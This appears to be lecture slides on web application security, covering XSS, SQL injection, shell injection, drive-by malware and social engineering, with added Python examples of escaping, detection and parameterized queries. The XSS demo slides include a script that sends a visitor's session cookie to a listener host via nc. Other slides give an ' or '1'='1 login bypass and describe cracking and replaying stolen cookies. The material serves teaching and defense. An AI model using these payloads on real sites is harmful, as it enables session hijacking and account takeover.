Auditing Web Security

Objectives
• Understand the complexity of Web infrastructure and current trends of Web threats
• Understand the mechanisms and defense of major Web attacks: XSS, SQL injection and shell attacks
Why Web Security: a Real Business Problem
• > 60% of total attack attempts observed on the Net are against Web applications
• > 80% of vulnerabilities discovered are in web apps
• Independent security audit
• Regulatory compliance
Anatomy of Web Attacks
1. Attacker breaks into a legitimate website and posts malware
• Malware is no longer exclusive to malicious Web sites.
2. Attacking end-user machines.
• Malware on a Web site makes its way down on to a user’s machine when that user visits the host Web site.
• “Drive-by-download” – happens automatically with no user interaction required
• Additional techniques which do require some input from the user, but in practice are equally, if not more, effective.
3. Leveraging end user machines for malicious activity.
Anatomy of Web Attacks
Source: Web Based Attacks, Symantec 2009

• Big trend: software as a (Web-based) service
– Online banking, shopping, government, etc.
– Cloud computing
• Applications hosted on Web servers
– Written in a mixture of PHP, Java, Perl, Python, C, ASP
• Security is rarely the main concern
– Poorly written scripts with inadequate input validation
– Sensitive data stored in world-readable files
Web Applications
• Runs on a Web server or application server
• Takes input from Web users (via Web server)
• Interacts with back-end databases and third parties
• Prepares and outputs results for users (via Web server)
– Dynamically generated HTML pages
– Contain content from many different sources, often including regular users
  Blogs, social networks, photo-sharing websites…
  Web advertisements, usually third party
– A webpage can have content coming from 10-20 different domains
Typical Web Application Design
Two Sides of Web Security
• Web browser (front end)
– Can be attacked by any website it visits
– Attacks lead to malware installation (keyloggers, botnets), document theft, loss of private data
• Web application (back end)
– Runs at website: banks, online merchants, blogs, Google Apps, etc.
– Written in Javascript, PHP, ASP, JSP, Ruby, …
– Many potential bugs: XSS, SQL injection, XSRF
– Attacks lead to stolen credit cards, defaced sites, etc.
Chicago Tribune Home Page
How Are Legitimate Web Sites Compromised?
1. SQL Injection Attacks
2. Malicious Advertisements
– Many Web sites today display advertisements hosted by third-party advertising sites
– Volume of ads published automatically makes detection difficult
– Random appearances further compound the detection
3. Search Engine Result Redirection
4. Attacks on the backend virtual hosting companies
5. Cross-site scripting (XSS) attacks
6. Vulnerabilities in the Web server or forum hosting software (e.g., shell attacks)
JavaScript
• Language executed by browser
– Scripts are embedded in Web pages
– Can run before HTML is loaded, before page is viewed, while it is being viewed or when leaving the page
• Used to implement “active” web pages
– AJAX, huge number of Web-based applications
• Many security and correctness issues
– Attacker gets to execute some code on user’s machine
– Often used to exploit other vulnerabilities
Cross Site Scripting
• Attacker goal: get their code into the browser
• XSS forces a website visitor to execute malicious code in his/her browser
• Accounts for roughly 80% of all documented security vulnerabilities
XSS Risks
• XSS abuses render engines or plug-ins
• Steal browser cookies
• Steal session info for replay attack
• Malware or bot installation
• Redirect or phishing attempt
XSS Example 1
• Trudy posts the following JavaScript on a message board:
    <script language="javascript">
    var url = "http://machineaddress:5000/index.html?cookie=" + encodeURI(document.cookie);
    </script>
• Then run a TCP server listening on port 5000 with e.g., nc -l 5000
• When Bob views the posted message, his browser executes the malicious script, and his session cookie is sent to Trudy
XSS Demo Instructions
• Set port forward to bypass the firewall
    ssh -L 8000:netsec-demos:2000 [email protected]
• Note: 8000 is the local port, it's forwarded to netsec-demos port 2000 through netsec-1
• Use http://localhost:8000 to access http://netsec-demos.cs.northwestern.edu:2000
XSS Demo Instructions (II)
• Login as ychen and post the script with a sexy title (e.g., hot game!)
    <script language="javascript">
    var url = "http://cal.cs.northwestern.edu:5000/index.html?cookie=";
    url = url + encodeURI(document.cookie);
    new Image().src=url;
    </script>
    Hi Everyone! Thanks for your cookies!
• Ssh to that machine (e.g., cal.cs.northwestern.edu) and run
    nc -l 5000
Simple XSS Code
    var url = "http://machineaddress:5000/index.html?cookie=" + encodeURI(document.cookie);
• document.cookie is the browser's entire cookie for the current website
• encodeURI() is a javascript function to hex-encode certain characters to be included as part of a URL
– E.g., changing the space character to %20
– Makes the URL less suspicious
What can Attacker Do with the Cookie?
• Another user, test458, logs in and when clicking the post, the cookie is sent to the attacker
• Crack Bob’s password (MD5 hash in the cookie) with John the Ripper, Hydra, or any password cracker
• For more info, http://netsec.cs.northwestern.edu/resources/password-cracking/
• Use a Firefox plugin like Tamperdata to reset your cookies to impersonate Bob
XSS Detection
• A client usually is not supposed to send scripts to servers
• If the server receives <SCRIPT>… or the hex equivalent in an incoming packet and that same script is sent unsanitized in an outgoing packet, then an attack has occurred
– A sanitized script could look like &lt;SCRIPT>…
• Any user input must be preprocessed before it is used inside HTML
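The preprocessing and the detection rule on this slide, as an added example that is not part of the original slides: html.escape() does the preprocessing, and xss_reflected() applies the rule (a script tag arrives in the request and the same tag leaves unsanitized in the response). The form-field contents, the "hot game!" title and the placeholder script are constructed sample input.

```python
import html
import re
from urllib.parse import unquote_plus

# A <script ...> opening tag, case-insensitive; the "hex equivalent" from the
# slide (%3Cscript%3E) is covered by decoding the request first.
SCRIPT_TAG = re.compile(r"<script\b", re.IGNORECASE)

def contains_script(request_data: str) -> bool:
    """True if the request carries a script tag, plain or %-encoded."""
    return bool(SCRIPT_TAG.search(request_data)
                or SCRIPT_TAG.search(unquote_plus(request_data)))

def render_post_unsafe(title: str, body: str) -> str:
    """The vulnerable pattern: user input pasted straight into the page."""
    return f"<h2>{title}</h2><p>{body}</p>"

def render_post_safe(title: str, body: str) -> str:
    """Preprocess every user string before it goes inside HTML: html.escape
    turns < into &lt; (and & > " ' too), so the browser shows the script as
    text instead of executing it."""
    return f"<h2>{html.escape(title)}</h2><p>{html.escape(body)}</p>"

def xss_reflected(request_data: str, response_html: str) -> bool:
    """Detection rule from the slide: a script tag came in with the request
    and a script tag goes out unsanitized in the response."""
    return contains_script(request_data) and bool(SCRIPT_TAG.search(response_html))

# Constructed sample form bodies, URL-encoded as a browser submits them.
# ATTACK_BODY is a script tag of the same shape as the demo post (constructed,
# placeholder content); BENIGN_BODY contains a '<' that is not a tag at all.
ATTACK_BODY = "%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E"
BENIGN_BODY = "Thanks+for+the+tip%2C+1+%3C+2+is+true%21"

def check(body_field: str) -> dict:
    """Decode the field, render it both ways and apply the rule to each."""
    text = unquote_plus(body_field)
    unsafe_html = render_post_unsafe("hot game!", text)
    safe_html = render_post_safe("hot game!", text)
    return {
        "script_in_request": contains_script(body_field),
        "flag_unsafe": xss_reflected(body_field, unsafe_html),
        "flag_safe": xss_reflected(body_field, safe_html),
        "safe_html": safe_html,
    }

if __name__ == "__main__":
    for label, body in (("attack", ATTACK_BODY), ("benign", BENIGN_BODY)):
        print(label, check(body))
```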
SQL Injection
• Malicious SQL statements run on a database and thus attack the server
– XSS can only target other users
SQL Injection Example
• Trudy accesses Bob’s website, in which he does not validate input on his sign in form
– Runs a SQL statement like the following:
    select username, user_password from minibbtable_users where user_password = md5('johnspassword') and username='johndoe';
• Set username to ' or '1'='1
    select username, user_password from minibbtable_users where user_password = md5('anyrandompassword') and username='' or '1'='1';
• Effect: picks any row where the username is blank and the password matches, or any row where true.
• Add “limit 1” to pick the first row
SQL Injection Detection
• Input validation on any outgoing SQL statements from the web server to the database server
– Filter apostrophes, semicolons, percent symbols, hyphens, underscores, …
– Any character that has special meanings must be escaped, e.g., convert ’ into \’
– Only works for string inputs
– Different databases have different rules for escaping
– Check the data type (e.g., make sure it’s an integer)
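The sign-in query from the example and the defenses on this slide (escaping with the backend's own rule, and the data-type check), plus a parameterized query that the slides do not mention, as an added example that is not part of the original slides. It assumes an in-memory SQLite table standing in for minibbtable_users with constructed users; md5() is computed in Python because SQLite has no md5() function.

```python
import hashlib
import re
import sqlite3

# Constructed users standing in for the minibbtable_users table on the slide.
USERS = [("johndoe", "johnspassword"), ("test458", "letmein")]
INJECTED_USERNAME = "' or '1'='1"      # the username from the slide

def md5(text: str) -> str:
    return hashlib.md5(text.encode()).hexdigest()

def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("create table minibbtable_users (username text, user_password text)")
    conn.executemany("insert into minibbtable_users values (?, ?)",
                     [(name, md5(pw)) for name, pw in USERS])
    return conn

def login_unsafe(conn, username, password):
    """The vulnerable sign-in: the username is spliced into the SQL text, so
    the quote in ' or '1'='1 closes the literal and the rest becomes SQL."""
    sql = ("select username, user_password from minibbtable_users "
           f"where user_password = '{md5(password)}' and username='{username}'")
    return conn.execute(sql).fetchall()

def login_escaped(conn, username, password):
    """The escaping defense from the slide, with SQLite's rule (double the
    quote). MySQL also accepts \\', which is the 'different rules per
    database' caveat: hand-rolled escaping has to match the backend."""
    quoted = username.replace("'", "''")
    sql = ("select username, user_password from minibbtable_users "
           f"where user_password = '{md5(password)}' and username='{quoted}'")
    return conn.execute(sql).fetchall()

def login_safe(conn, username, password):
    """Parameterized query (not on the slide): values are sent separately from
    the SQL text, so the database never parses user input as syntax."""
    sql = ("select username, user_password from minibbtable_users "
           "where user_password = ? and username = ?")
    return conn.execute(sql, (md5(password), username)).fetchall()

def as_user_id(raw: str):
    """The data-type check from the slide for non-string inputs: accept only
    a plain ASCII non-negative integer, returning None otherwise."""
    return int(raw) if re.fullmatch(r"[0-9]+", raw) else None

if __name__ == "__main__":
    db = make_db()
    print("unsafe :", login_unsafe(db, INJECTED_USERNAME, "anyrandompassword"))
    print("escaped:", login_escaped(db, INJECTED_USERNAME, "anyrandompassword"))
    print("safe   :", login_safe(db, INJECTED_USERNAME, "anyrandompassword"))
    print("id     :", as_user_id("42"), as_user_id("1 or 1=1"))
```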
Shell Attacks
• Control an actual machine like a web server
Shell Attacks
• Inject commands into scripts that use Linux utilities
– E.g., with “;” as command separator in UNIX/LINUX
• CGI programs like perl can use command-line programs (e.g. grep, ls)
• Unsanitized input as arguments can lead to command execution.
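The “;” separator problem and its hardened form, as an added example that is not part of the original slides. The search term, file name and allow-list are assumptions; the vulnerable command line is only built and tokenized, never executed, and the Python interpreter stands in for grep so the argv check runs anywhere.

```python
import json
import re
import shlex
import subprocess
import sys

# Allow-list for a search term handed to grep: word characters, space, dot
# and dash. Anything else (; | & $ ` newline ...) is rejected before any
# command is assembled. The exact character set is an assumption.
SAFE_TERM = re.compile(r"[A-Za-z0-9 ._-]{1,64}")

def is_safe_term(term: str) -> bool:
    return SAFE_TERM.fullmatch(term) is not None

def unsafe_command_line(term: str, path: str) -> str:
    """What the vulnerable CGI script hands to /bin/sh when it concatenates
    input into a command string. Built here for inspection, never executed."""
    return f"grep {term} {path}"

def shell_words(command_line: str) -> list:
    """How a POSIX shell tokenizes that string: ';' becomes its own token, and
    everything after it is a second command."""
    lexer = shlex.shlex(command_line, posix=True, punctuation_chars=True)
    return list(lexer)

def safe_argv(term: str, path: str) -> list:
    """Hardened form: validate the term, then pass it as one argv element with
    no shell in between; '--' keeps a term starting with '-' from being read
    as a grep option."""
    if not is_safe_term(term):
        raise ValueError(f"rejected search term: {term!r}")
    return ["grep", "--", term, path]

def argv_received(args: list) -> list:
    """Run a child process without a shell and return the argv it saw. The
    Python interpreter stands in for grep; the point is that 'foo; id'
    arrives as one literal argument, not as two commands."""
    child = [sys.executable, "-c",
             "import sys, json; print(json.dumps(sys.argv[1:]))", *args]
    done = subprocess.run(child, capture_output=True, text=True, check=True)
    return json.loads(done.stdout)

INJECTED = "foo; id"          # constructed input using ';' as the separator

if __name__ == "__main__":
    line = unsafe_command_line(INJECTED, "guestbook.txt")
    print("shell sees :", shell_words(line))
    print("argv sees  :", argv_received([INJECTED, "guestbook.txt"]))
    print("validation :", is_safe_term(INJECTED), is_safe_term("hot game"))
```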
Defense Approaches
• Web firewall/IDS
– ModSecurity for Apache
– Commercial: SecureSphere from Imperva
• Static code analysis
– Open source: Nikto
– Commercial: Acunetix Web Vulnerability Scanner, N-stalker
• Education on good coding
– HTML encoding on input (server-side)
– Input validation/filtering
GETTING ONTO A USER’S COMPUTER
Source: Web Based Attacks, Symantec 2009
Automatic Attack Exposure
• Techniques used to deliver malware from Websites to a user’s computer.
• Exposure
– Browsing a website
– No user interaction is required
– Executable content is automatically downloaded
Social Engineering
Source: Web Based Attacks, Symantec 2009
• People are tricked into performing actions they would not otherwise want to perform

Types of Social Engineering Attacks
• Fake Codec
• Malicious Peer-to-Peer (P2P) Files
• Malicious Advertisements
• Fake Scanner Web Page
• Blog Spam
• Other Attack Vectors
Fake Codec
• User is prompted to install a missing codec
• Codec is actually malware code
– Usually a trojan horse
Malicious Peer-to-Peer (P2P) Files
• Malware authors bind content into popular applications
– Files named after celebrities, popular bands
– Uploaded to popular P2P sites where they are downloaded by unsuspecting users
• Openly available how-to materials on the internet
– Details how to build and distribute malware
– Pay-Per-Install malware
Fake Scanner Web Page
• Create a web site or product that misrepresents the truth
– JavaScript pop-ups notifying of false need to install operating system updates
– Tools that claim to scan for and remove adult images, etc.
Source: Web Based Attacks, Symantec 2009
Blog Spam
• Alluring links posted on blogs
– Links embedded in blog comments
– Direct users to sites that leverage social engineering tricks or browser exploits to spread malware
Other Attack Vectors
• Spam
– Emails contain links directing people to drive by download, fake scanner/codec, and malware sites
• Pirated software sites
– Pirated versions of software are bundled with or comprised solely of trojan horses

Other Attack Vectors
What is buffer overflow?
• Hackers typically break into a remote system by exploiting some vulnerability of its software --- a programming or configuration bug that makes it possible to subvert the software and have it execute unplanned instructions.
• A buffer overflow occurs anytime the program writes more information into the buffer than the space it has allocated in memory. This allows an attacker to overwrite data that controls the program execution path and hijack control of the program to execute the attacker’s code instead of the process code.
How to Protect Yourself
• Update and Patch Software
– Get latest OS, Browser, Application patches
– Browser Plug-in updates often forgotten
• Endpoint Protection Software
– Anti-virus software for signature based detection and behavioral monitoring
– Update Protection Software Subscription
  Could miss 70,000 new unique virus variants for one week
• Be Suspicious
– Avoid things that seem too good to be true
– Use safe search functionality in browsers
• Adopt Strong Password Policy